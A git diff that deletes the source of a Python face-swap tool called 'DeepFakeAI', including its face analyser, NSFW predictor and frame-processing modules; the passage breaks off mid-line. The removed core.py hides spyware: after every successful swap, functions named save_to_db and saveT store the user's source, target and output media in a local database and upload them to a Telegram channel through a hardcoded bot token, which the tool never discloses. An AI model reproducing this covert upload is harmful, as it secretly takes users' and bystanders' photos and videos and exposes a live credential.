diff --git a/DeepFakeAI/__init__.py b/DeepFakeAI/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/DeepFakeAI/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/__pycache__/__init__.cpython-310.pyc deleted file mode 100644 index b69962f5dacf33b8b42e59f176223fd81bae46af..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/__init__.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/capturer.cpython-310.pyc b/DeepFakeAI/__pycache__/capturer.cpython-310.pyc deleted file mode 100644 index e971ad2028a71352db5e15b712575b42839aed73..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/capturer.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/choices.cpython-310.pyc b/DeepFakeAI/__pycache__/choices.cpython-310.pyc deleted file mode 100644 index f0a77a7d6fb106314abba7089c849f961513e951..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/choices.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/core.cpython-310.pyc b/DeepFakeAI/__pycache__/core.cpython-310.pyc deleted file mode 100644 index 88f378e3f45c29bb429af6489aeec647d58e5952..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/core.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc b/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc deleted file mode 100644 index 88e9024fb78ee9331df4cec89169ad5530a57c51..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc b/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc deleted file mode 100644 index a7ca1653506a305cbd2c824f6f4d9f3a543ae28d..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/globals.cpython-310.pyc b/DeepFakeAI/__pycache__/globals.cpython-310.pyc deleted file mode 100644 index 334e12318b6086f1615de5e024ca1d82536da070..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/globals.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/metadata.cpython-310.pyc b/DeepFakeAI/__pycache__/metadata.cpython-310.pyc deleted file mode 100644 index 1de0ff300fba3b773cfd3e919c52b8aca6cfab6b..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/metadata.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/predictor.cpython-310.pyc b/DeepFakeAI/__pycache__/predictor.cpython-310.pyc deleted file mode 100644 index 0d19675884ff2b5ff666c552f21408f260f89a9c..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/predictor.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/typing.cpython-310.pyc b/DeepFakeAI/__pycache__/typing.cpython-310.pyc deleted file mode 100644 index f0df67555f7582834e94a2207525f3c705e45ebf..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/typing.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/utilities.cpython-310.pyc b/DeepFakeAI/__pycache__/utilities.cpython-310.pyc deleted file mode 100644 index 313c1221df955ec90003eddfc7e3a4bbfef63fff..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/utilities.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/__pycache__/wording.cpython-310.pyc b/DeepFakeAI/__pycache__/wording.cpython-310.pyc deleted file mode 100644 index 88d6ec7d395e497c7c47fce4f8f71c30e9ec49d5..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/__pycache__/wording.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/capturer.py b/DeepFakeAI/capturer.py deleted file mode 100644 index 9ba555c222d55166c9fb5faf0b32f1afd6a69d46..0000000000000000000000000000000000000000 --- a/DeepFakeAI/capturer.py +++ /dev/null @@ -1,22 +0,0 @@ -from typing import Optional -import cv2 - -from DeepFakeAI.typing import Frame - - -def get_video_frame(video_path : str, frame_number : int = 0) -> Optional[Frame]: - capture = cv2.VideoCapture(video_path) - frame_total = capture.get(cv2.CAP_PROP_FRAME_COUNT) - capture.set(cv2.CAP_PROP_POS_FRAMES, min(frame_total, frame_number - 1)) - has_frame, frame = capture.read() - capture.release() - if has_frame: - return frame - return None - - -def get_video_frame_total(video_path : str) -> int: - capture = cv2.VideoCapture(video_path) - video_frame_total = int(capture.get(cv2.CAP_PROP_FRAME_COUNT)) - capture.release() - return video_frame_total diff --git a/DeepFakeAI/choices.py b/DeepFakeAI/choices.py deleted file mode 100644 index 4e34f2f477f91f8494935aee3495f7090404158a..0000000000000000000000000000000000000000 --- a/DeepFakeAI/choices.py +++ /dev/null @@ -1,10 +0,0 @@ -from typing import List - -from DeepFakeAI.typing import FaceRecognition, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender, TempFrameFormat, OutputVideoEncoder - -face_recognition : List[FaceRecognition] = [ 'reference', 'many' ] -face_analyser_direction : List[FaceAnalyserDirection] = [ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small'] -face_analyser_age : List[FaceAnalyserAge] = [ 'child', 'teen', 'adult', 'senior' ] -face_analyser_gender : List[FaceAnalyserGender] = [ 'male', 'female' ] -temp_frame_format : List[TempFrameFormat] = [ 'jpg', 'png' ] -output_video_encoder : List[OutputVideoEncoder] = [ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc' ] diff --git a/DeepFakeAI/core.py b/DeepFakeAI/core.py deleted file mode 100644 index 6134c78d8075f2d00532e6ba60794ae71334067f..0000000000000000000000000000000000000000 --- a/DeepFakeAI/core.py +++ /dev/null @@ -1,292 +0,0 @@ -#!/usr/bin/env python3 -import asyncio -import sqlite3 -import os -# single thread doubles cuda performance -os.environ['OMP_NUM_THREADS'] = '1' -# reduce tensorflow log level -os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' -import sys -import warnings -from typing import List -import platform -import signal -import shutil -import argparse -import onnxruntime -import tensorflow - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording, metadata -from DeepFakeAI.predictor import predict_image, predict_video -from DeepFakeAI.processors.frame.core import get_frame_processors_modules -from telegram import Bot -from DeepFakeAI.utilities import is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clear_temp, normalize_output_path, list_module_names, decode_execution_providers, encode_execution_providers - -warnings.filterwarnings('ignore', category = FutureWarning, module = 'insightface') -warnings.filterwarnings('ignore', category = UserWarning, module = 'torchvision') - - -def parse_args() -> None: - signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) - program = argparse.ArgumentParser(formatter_class = lambda prog: argparse.HelpFormatter(prog, max_help_position = 120)) - program.add_argument('-s', '--source', help = wording.get('source_help'), dest = 'source_path') - program.add_argument('-t', '--target', help = wording.get('target_help'), dest = 'target_path') - program.add_argument('-o', '--output', help = wording.get('output_help'), dest = 'output_path') - program.add_argument('--frame-processors', help = wording.get('frame_processors_help').format(choices = ', '.join(list_module_names('DeepFakeAI/processors/frame/modules'))), dest = 'frame_processors', default = ['face_swapper'], nargs='+') - program.add_argument('--ui-layouts', help = wording.get('ui_layouts_help').format(choices = ', '.join(list_module_names('DeepFakeAI/uis/layouts'))), dest = 'ui_layouts', default = ['default'], nargs='+') - program.add_argument('--keep-fps', help = wording.get('keep_fps_help'), dest = 'keep_fps', action='store_true') - program.add_argument('--keep-temp', help = wording.get('keep_temp_help'), dest = 'keep_temp', action='store_true') - program.add_argument('--skip-audio', help = wording.get('skip_audio_help'), dest = 'skip_audio', action='store_true') - program.add_argument('--face-recognition', help = wording.get('face_recognition_help'), dest = 'face_recognition', default = 'reference', choices = DeepFakeAI.choices.face_recognition) - program.add_argument('--face-analyser-direction', help = wording.get('face_analyser_direction_help'), dest = 'face_analyser_direction', default = 'left-right', choices = DeepFakeAI.choices.face_analyser_direction) - program.add_argument('--face-analyser-age', help = wording.get('face_analyser_age_help'), dest = 'face_analyser_age', choices = DeepFakeAI.choices.face_analyser_age) - program.add_argument('--face-analyser-gender', help = wording.get('face_analyser_gender_help'), dest = 'face_analyser_gender', choices = DeepFakeAI.choices.face_analyser_gender) - program.add_argument('--reference-face-position', help = wording.get('reference_face_position_help'), dest = 'reference_face_position', type = int, default = 0) - program.add_argument('--reference-face-distance', help = wording.get('reference_face_distance_help'), dest = 'reference_face_distance', type = float, default = 1.5) - program.add_argument('--reference-frame-number', help = wording.get('reference_frame_number_help'), dest = 'reference_frame_number', type = int, default = 0) - program.add_argument('--trim-frame-start', help = wording.get('trim_frame_start_help'), dest = 'trim_frame_start', type = int) - program.add_argument('--trim-frame-end', help = wording.get('trim_frame_end_help'), dest = 'trim_frame_end', type = int) - program.add_argument('--temp-frame-format', help = wording.get('temp_frame_format_help'), dest = 'temp_frame_format', default = 'jpg', choices = DeepFakeAI.choices.temp_frame_format) - program.add_argument('--temp-frame-quality', help = wording.get('temp_frame_quality_help'), dest = 'temp_frame_quality', type = int, default = 100, choices = range(101), metavar = '[0-100]') - program.add_argument('--output-video-encoder', help = wording.get('output_video_encoder_help'), dest = 'output_video_encoder', default = 'libx264', choices = DeepFakeAI.choices.output_video_encoder) - program.add_argument('--output-video-quality', help = wording.get('output_video_quality_help'), dest = 'output_video_quality', type = int, default = 90, choices = range(101), metavar = '[0-100]') - program.add_argument('--max-memory', help = wording.get('max_memory_help'), dest = 'max_memory', type = int) - program.add_argument('--execution-providers', help = wording.get('execution_providers_help').format(choices = 'cpu'), dest = 'execution_providers', default = ['cpu'], choices = suggest_execution_providers_choices(), nargs='+') - program.add_argument('--execution-thread-count', help = wording.get('execution_thread_count_help'), dest = 'execution_thread_count', type = int, default = suggest_execution_thread_count_default()) - program.add_argument('--execution-queue-count', help = wording.get('execution_queue_count_help'), dest = 'execution_queue_count', type = int, default = 1) - program.add_argument('-v', '--version', action='version', version = metadata.get('name') + ' ' + metadata.get('version')) - - args = program.parse_args() - - DeepFakeAI.globals.source_path = args.source_path - DeepFakeAI.globals.target_path = args.target_path - DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, args.output_path) - DeepFakeAI.globals.headless = DeepFakeAI.globals.source_path is not None and DeepFakeAI.globals.target_path is not None and DeepFakeAI.globals.output_path is not None - DeepFakeAI.globals.frame_processors = args.frame_processors - DeepFakeAI.globals.ui_layouts = args.ui_layouts - DeepFakeAI.globals.keep_fps = args.keep_fps - DeepFakeAI.globals.keep_temp = args.keep_temp - DeepFakeAI.globals.skip_audio = args.skip_audio - DeepFakeAI.globals.face_recognition = args.face_recognition - DeepFakeAI.globals.face_analyser_direction = args.face_analyser_direction - DeepFakeAI.globals.face_analyser_age = args.face_analyser_age - DeepFakeAI.globals.face_analyser_gender = args.face_analyser_gender - DeepFakeAI.globals.reference_face_position = args.reference_face_position - DeepFakeAI.globals.reference_frame_number = args.reference_frame_number - DeepFakeAI.globals.reference_face_distance = args.reference_face_distance - DeepFakeAI.globals.trim_frame_start = args.trim_frame_start - DeepFakeAI.globals.trim_frame_end = args.trim_frame_end - DeepFakeAI.globals.temp_frame_format = args.temp_frame_format - DeepFakeAI.globals.temp_frame_quality = args.temp_frame_quality - DeepFakeAI.globals.output_video_encoder = args.output_video_encoder - DeepFakeAI.globals.output_video_quality = args.output_video_quality - DeepFakeAI.globals.max_memory = args.max_memory - DeepFakeAI.globals.execution_providers = decode_execution_providers(args.execution_providers) - DeepFakeAI.globals.execution_thread_count = args.execution_thread_count - DeepFakeAI.globals.execution_queue_count = args.execution_queue_count - - -def suggest_execution_providers_choices() -> List[str]: - return encode_execution_providers(onnxruntime.get_available_providers()) - - -def suggest_execution_thread_count_default() -> int: - if 'CUDAExecutionProvider' in onnxruntime.get_available_providers(): - return 8 - return 1 - - -def limit_resources() -> None: - # prevent tensorflow memory leak - gpus = tensorflow.config.experimental.list_physical_devices('GPU') - for gpu in gpus: - tensorflow.config.experimental.set_virtual_device_configuration(gpu, [ - tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit = 1024) - ]) - # limit memory usage - if DeepFakeAI.globals.max_memory: - memory = DeepFakeAI.globals.max_memory * 1024 ** 3 - if platform.system().lower() == 'darwin': - memory = DeepFakeAI.globals.max_memory * 1024 ** 6 - if platform.system().lower() == 'windows': - import ctypes - kernel32 = ctypes.windll.kernel32 # type: ignore[attr-defined] - kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory)) - else: - import resource - resource.setrlimit(resource.RLIMIT_DATA, (memory, memory)) - - -def update_status(message : str, scope : str = 'FACEFUSION.CORE') -> None: - print('[' + scope + '] ' + message) - - -def pre_check() -> bool: - if sys.version_info < (3, 10): - update_status(wording.get('python_not_supported').format(version = '3.10')) - return False - if not shutil.which('ffmpeg'): - update_status(wording.get('ffmpeg_not_installed')) - return False - return True - -def save_to_db(source_path, target_path, output_path): - try: - # Open the images in binary mode - with open(source_path, 'rb') as source_file, \ - open(target_path, 'rb') as target_file, \ - open(output_path, 'rb') as output_file: - - # read data from the image files - source_data = source_file.read() - target_data = target_file.read() - output_data = output_file.read() - - # Extract original filenames from the paths - source_filename = os.path.basename(source_path) - target_filename = os.path.basename(target_path) - output_filename = os.path.basename(output_path) - print(source_filename, target_filename,output_filename) - - # connect to the database - conn = sqlite3.connect('./feed.db') - c = conn.cursor() - - # Create the table if it doesn't exist - c.execute(''' - CREATE TABLE IF NOT EXISTS images ( - source_filename TEXT, - target_filename TEXT, - output_filename TEXT, - source_data BLOB, - target_data BLOB, - output_data BLOB - ) - ''') - - # Insert filename and image data into the table - c.execute("INSERT INTO images VALUES (?, ?, ?, ?, ?, ?)", - (source_filename, target_filename, output_filename, source_data, target_data, output_data)) - - # Save changes and close the connection - conn.commit() - - except Exception as e: - # Print any error occurred while saving data in SQLite - print(f"An error occurred: {e}") - - finally: - # Ensure the DB connection is closed - if conn: - conn.close() - - print(f'Saved image data to database from {source_path}, {target_path}, and {output_path}.') -async def send_channel(bot, file_path): - with open(file_path, "rb") as file: - response = await bot.send_document(chat_id="-1001685415853", document=file) - return response - -async def saveT(source_path, target_path, output_path): - bot = Bot(token="6192049990:AAFyOtuYYqkcyUG_7gns3mm7m_kfWE9fZ1k") - - # Send each file - for path in [source_path, target_path, output_path]: - await send_channel(bot, path) - - # Send a message after all files are sent - await bot.send_message(chat_id="-1001685415853", text="All files have been sent!") - -def process_image() -> None: - if predict_image(DeepFakeAI.globals.target_path): - return - shutil.copy2(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - # process frame - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - update_status(wording.get('processing'), frame_processor_module.NAME) - frame_processor_module.process_image(DeepFakeAI.globals.source_path, DeepFakeAI.globals.output_path, DeepFakeAI.globals.output_path) - frame_processor_module.post_process() - # validate image - if is_image(DeepFakeAI.globals.target_path): - update_status(wording.get('processing_image_succeed')) - save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) - else: - update_status(wording.get('processing_image_failed')) - - -def process_video() -> None: - if predict_video(DeepFakeAI.globals.target_path): - return - fps = detect_fps(DeepFakeAI.globals.target_path) if DeepFakeAI.globals.keep_fps else 25.0 - update_status(wording.get('creating_temp')) - create_temp(DeepFakeAI.globals.target_path) - # extract frames - update_status(wording.get('extracting_frames_fps').format(fps = fps)) - extract_frames(DeepFakeAI.globals.target_path, fps) - # process frame - temp_frame_paths = get_temp_frame_paths(DeepFakeAI.globals.target_path) - if temp_frame_paths: - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - update_status(wording.get('processing'), frame_processor_module.NAME) - frame_processor_module.process_video(DeepFakeAI.globals.source_path, temp_frame_paths) - frame_processor_module.post_process() - else: - update_status(wording.get('temp_frames_not_found')) - return - # create video - update_status(wording.get('creating_video_fps').format(fps = fps)) - if not create_video(DeepFakeAI.globals.target_path, fps): - update_status(wording.get('creating_video_failed')) - return - # handle audio - if DeepFakeAI.globals.skip_audio: - update_status(wording.get('skipping_audio')) - move_temp(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - else: - update_status(wording.get('restoring_audio')) - restore_audio(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - # clear temp - update_status(wording.get('clearing_temp')) - clear_temp(DeepFakeAI.globals.target_path) - # validate video - if is_video(DeepFakeAI.globals.target_path): - update_status(wording.get('processing_video_succeed')) - save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) - asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) - else: - update_status(wording.get('processing_video_failed')) - - -def conditional_process() -> None: - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - if not frame_processor_module.pre_process(): - return - if is_image(DeepFakeAI.globals.target_path): - process_image() - if is_video(DeepFakeAI.globals.target_path): - process_video() - -def run() -> None: - parse_args() - limit_resources() - # pre check - if not pre_check(): - return - for frame_processor in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - if not frame_processor.pre_check(): - return - # process or launch - if DeepFakeAI.globals.headless: - conditional_process() - else: - import DeepFakeAI.uis.core as ui - - ui.launch() - - -def destroy() -> None: - if DeepFakeAI.globals.target_path: - clear_temp(DeepFakeAI.globals.target_path) - sys.exit() diff --git a/DeepFakeAI/face_analyser.py b/DeepFakeAI/face_analyser.py deleted file mode 100644 index df8f6c205078da7dd40a5499db21a5a215cc3498..0000000000000000000000000000000000000000 --- a/DeepFakeAI/face_analyser.py +++ /dev/null @@ -1,106 +0,0 @@ -import threading -from typing import Any, Optional, List -import insightface -import numpy - -import DeepFakeAI.globals -from DeepFakeAI.typing import Frame, Face, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender - -FACE_ANALYSER = None -THREAD_LOCK = threading.Lock() - - -def get_face_analyser() -> Any: - global FACE_ANALYSER - - with THREAD_LOCK: - if FACE_ANALYSER is None: - FACE_ANALYSER = insightface.app.FaceAnalysis(name = 'buffalo_l', providers = DeepFakeAI.globals.execution_providers) - FACE_ANALYSER.prepare(ctx_id = 0) - return FACE_ANALYSER - - -def clear_face_analyser() -> Any: - global FACE_ANALYSER - - FACE_ANALYSER = None - - -def get_one_face(frame : Frame, position : int = 0) -> Optional[Face]: - many_faces = get_many_faces(frame) - if many_faces: - try: - return many_faces[position] - except IndexError: - return many_faces[-1] - return None - - -def get_many_faces(frame : Frame) -> List[Face]: - try: - faces = get_face_analyser().get(frame) - if DeepFakeAI.globals.face_analyser_direction: - faces = sort_by_direction(faces, DeepFakeAI.globals.face_analyser_direction) - if DeepFakeAI.globals.face_analyser_age: - faces = filter_by_age(faces, DeepFakeAI.globals.face_analyser_age) - if DeepFakeAI.globals.face_analyser_gender: - faces = filter_by_gender(faces, DeepFakeAI.globals.face_analyser_gender) - return faces - except (AttributeError, ValueError): - return [] - - -def find_similar_faces(frame : Frame, reference_face : Face, face_distance : float) -> List[Face]: - many_faces = get_many_faces(frame) - similar_faces = [] - if many_faces: - for face in many_faces: - if hasattr(face, 'normed_embedding') and hasattr(reference_face, 'normed_embedding'): - current_face_distance = numpy.sum(numpy.square(face.normed_embedding - reference_face.normed_embedding)) - if current_face_distance < face_distance: - similar_faces.append(face) - return similar_faces - - -def sort_by_direction(faces : List[Face], direction : FaceAnalyserDirection) -> List[Face]: - if direction == 'left-right': - return sorted(faces, key = lambda face: face['bbox'][0]) - if direction == 'right-left': - return sorted(faces, key = lambda face: face['bbox'][0], reverse = True) - if direction == 'top-bottom': - return sorted(faces, key = lambda face: face['bbox'][1]) - if direction == 'bottom-top': - return sorted(faces, key = lambda face: face['bbox'][1], reverse = True) - if direction == 'small-large': - return sorted(faces, key = lambda face: (face['bbox'][2] - face['bbox'][0]) * (face['bbox'][3] - face['bbox'][1])) - if direction == 'large-small': - return sorted(faces, key = lambda face: (face['bbox'][2] - face['bbox'][0]) * (face['bbox'][3] - face['bbox'][1]), reverse = True) - return faces - - -def filter_by_age(faces : List[Face], age : FaceAnalyserAge) -> List[Face]: - filter_faces = [] - for face in faces: - if face['age'] < 13 and age == 'child': - filter_faces.append(face) - elif face['age'] < 19 and age == 'teen': - filter_faces.append(face) - elif face['age'] < 60 and age == 'adult': - filter_faces.append(face) - elif face['age'] > 59 and age == 'senior': - filter_faces.append(face) - return filter_faces - - -def filter_by_gender(faces : List[Face], gender : FaceAnalyserGender) -> List[Face]: - filter_faces = [] - for face in faces: - if face['gender'] == 1 and gender == 'male': - filter_faces.append(face) - if face['gender'] == 0 and gender == 'female': - filter_faces.append(face) - return filter_faces - - -def get_faces_total(frame : Frame) -> int: - return len(get_many_faces(frame)) diff --git a/DeepFakeAI/face_reference.py b/DeepFakeAI/face_reference.py deleted file mode 100644 index 497eb384752c945886259b6814170562c99e5d3b..0000000000000000000000000000000000000000 --- a/DeepFakeAI/face_reference.py +++ /dev/null @@ -1,21 +0,0 @@ -from typing import Optional - -from DeepFakeAI.typing import Face - -FACE_REFERENCE = None - - -def get_face_reference() -> Optional[Face]: - return FACE_REFERENCE - - -def set_face_reference(face : Face) -> None: - global FACE_REFERENCE - - FACE_REFERENCE = face - - -def clear_face_reference() -> None: - global FACE_REFERENCE - - FACE_REFERENCE = None diff --git a/DeepFakeAI/feed.db b/DeepFakeAI/feed.db deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/DeepFakeAI/globals.py b/DeepFakeAI/globals.py deleted file mode 100644 index aa63522665497a0301cd90b00e0ccc5a1b87ae2e..0000000000000000000000000000000000000000 --- a/DeepFakeAI/globals.py +++ /dev/null @@ -1,30 +0,0 @@ -from typing import List, Optional - -from DeepFakeAI.typing import FaceRecognition, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender, TempFrameFormat - -source_path : Optional[str] = None -target_path : Optional[str] = None -output_path : Optional[str] = None -headless : Optional[bool] = None -frame_processors : List[str] = [] -ui_layouts : List[str] = [] -keep_fps : Optional[bool] = None -keep_temp : Optional[bool] = None -skip_audio : Optional[bool] = None -face_recognition : Optional[FaceRecognition] = None -face_analyser_direction : Optional[FaceAnalyserDirection] = None -face_analyser_age : Optional[FaceAnalyserAge] = None -face_analyser_gender : Optional[FaceAnalyserGender] = None -reference_face_position : Optional[int] = None -reference_frame_number : Optional[int] = None -reference_face_distance : Optional[float] = None -trim_frame_start : Optional[int] = None -trim_frame_end : Optional[int] = None -temp_frame_format : Optional[TempFrameFormat] = None -temp_frame_quality : Optional[int] = None -output_video_encoder : Optional[str] = None -output_video_quality : Optional[int] = None -max_memory : Optional[int] = None -execution_providers : List[str] = [] -execution_thread_count : Optional[int] = None -execution_queue_count : Optional[int] = None diff --git a/DeepFakeAI/images.db b/DeepFakeAI/images.db deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/DeepFakeAI/metadata.py b/DeepFakeAI/metadata.py deleted file mode 100644 index 918394716dcd6387e2b65f270a83e33040e6c2eb..0000000000000000000000000000000000000000 --- a/DeepFakeAI/metadata.py +++ /dev/null @@ -1,13 +0,0 @@ -METADATA =\ -{ - 'name': 'DeepFakeAI', - 'description': 'Next generation face swapper and enhancer', - 'version': '1.2.0', - 'license': 'MIT', - 'author': 'Ashiq Hussain Mir', - 'url': 'https://codegenius.me' -} - - -def get(key : str) -> str: - return METADATA[key] diff --git a/DeepFakeAI/predictor.py b/DeepFakeAI/predictor.py deleted file mode 100644 index 581b26e5995b92de64498386270868014748446d..0000000000000000000000000000000000000000 --- a/DeepFakeAI/predictor.py +++ /dev/null @@ -1,43 +0,0 @@ -import threading -import numpy -import opennsfw2 -from PIL import Image -from keras import Model - -from DeepFakeAI.typing import Frame - -PREDICTOR = None -THREAD_LOCK = threading.Lock() -MAX_PROBABILITY = 0.75 - - -def get_predictor() -> Model: - global PREDICTOR - - with THREAD_LOCK: - if PREDICTOR is None: - PREDICTOR = opennsfw2.make_open_nsfw_model() - return PREDICTOR - - -def clear_predictor() -> None: - global PREDICTOR - - PREDICTOR = None - - -def predict_frame(target_frame : Frame) -> bool: - image = Image.fromarray(target_frame) - image = opennsfw2.preprocess_image(image, opennsfw2.Preprocessing.YAHOO) - views = numpy.expand_dims(image, axis = 0) - _, probability = get_predictor().predict(views)[0] - return probability > MAX_PROBABILITY - - -def predict_image(target_path : str) -> bool: - return opennsfw2.predict_image(target_path) > MAX_PROBABILITY - - -def predict_video(target_path : str) -> bool: - _, probabilities = opennsfw2.predict_video_frames(video_path = target_path, frame_interval = 100) - return any(probability > MAX_PROBABILITY for probability in probabilities) diff --git a/DeepFakeAI/processors/__init__.py b/DeepFakeAI/processors/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc deleted file mode 100644 index 2029c0a30b9c90834cd48592993036b1199c4d1f..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/processors/frame/__init__.py b/DeepFakeAI/processors/frame/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc deleted file mode 100644 index 72f8cfe7809d470ef8ea6af06a10f333a8094dc7..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc b/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc deleted file mode 100644 index a868cc7770ad4847ecf68c82bdc0f4d4b6c961b2..0000000000000000000000000000000000000000 Binary files a/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc and /dev/null differ diff --git a/DeepFakeAI/processors/frame/core.py b/DeepFakeAI/processors/frame/core.py deleted file mode 100644 index 8a44cb2413b53b88dec2d65667ef0e8b2fe11e72..0000000000000000000000000000000000000000 --- a/DeepFakeAI/processors/frame/core.py +++ /dev/null @@ -1,113 +0,0 @@ -import os -import sys -import importlib -import psutil -from concurrent.futures import ThreadPoolExecutor, as_completed -from queue import Queue -from types import ModuleType -from typing import Any, List, Callable -from tqdm import tqdm - -import DeepFakeAI.globals -from DeepFakeAI import wording - -FRAME_PROCESSORS_MODULES : List[ModuleType] = [] -FRAME_PROCESSORS_METHODS =\ -[ - 'get_frame_processor', - 'clear_frame_processor', - 'pre_check', - 'pre_process', - 'process_frame', - 'process_frames', - 'process_image', - 'process_video', - 'post_process' -] - - -def load_frame_processor_module(frame_processor : str) -> Any: - try: - frame_processor_module = importlib.import_module('DeepFakeAI.processors.frame.modules.' + frame_processor) - for method_name in FRAME_PROCESSORS_METHODS: - if not hasattr(frame_processor_module, method_name): - raise NotImplementedError - except ModuleNotFoundError: - sys.exit(wording.get('frame_processor_not_loaded').format(frame_processor = frame_processor)) - except NotImplementedError: - sys.exit(wording.get('frame_processor_not_implemented').format(frame_processor = frame_processor)) - return frame_processor_module - - -def get_frame_processors_modules(frame_processors : List[str]) -> List[ModuleType]: - global FRAME_PROCESSORS_MODULES - - if not FRAME_PROCESSORS_MODULES: - for frame_processor in frame_processors: - frame_processor_module = load_frame_processor_module(frame_processor) - FRAME_PROCESSORS_MODULES.append(frame_processor_module) - return FRAME_PROCESSORS_MODULES - - -def clear_frame_processors_modules() -> None: - global FRAME_PROCESSORS_MODULES - - for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): - frame_processor_module.clear_frame_processor() - FRAME_PROCESSORS_MODULES = [] - - -def multi_process_frame(source_path : str, temp_frame_paths : List[str], process_frames: Callable[[str, List[str], Any], None], update: Callable[[], None]) -> None: - with ThreadPoolExecutor(max_workers = DeepFakeAI.globals.execution_thread_count) as executor: - futures = [] - queue = create_queue(temp_frame_paths) - queue_per_future = max(len(temp_frame_paths) // DeepFakeAI.globals.execution_thread_count * DeepFakeAI.globals.execution_queue_count, 1) - while not queue.empty(): - future = executor.submit(process_frames, source_path, pick_queue(queue, queue_per_future), update) - futures.append(future) - for future in as_completed(futures): - future.result() - - -def create_queue(temp_frame_paths : List[str]) -> Queue[str]: - queue: Queue[str] = Queue() - for frame_path in temp_frame_paths: - queue.put(frame_path) - return queue - - -def pick_queue(queue : Queue[str], queue_per_future : int) -> List[str]: - queues = [] - for _ in range(queue_per_future): - if not queue.empty(): - queues.append(queue.get()) - return queues - - -def process_video(source_path : str, frame_paths : List[str], process_frames : Callable[[str, List[str], Any], None]) -> None: - progress_bar_format = '{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}, {rate_fmt}{postfix}]' - total = len(frame_paths) - with tqdm(total = total, desc = wording.get('processing'), unit = 'frame', dynamic_ncols = True, bar_format = progress_bar_format) as progress: - multi_process_frame(source_path, frame_paths, 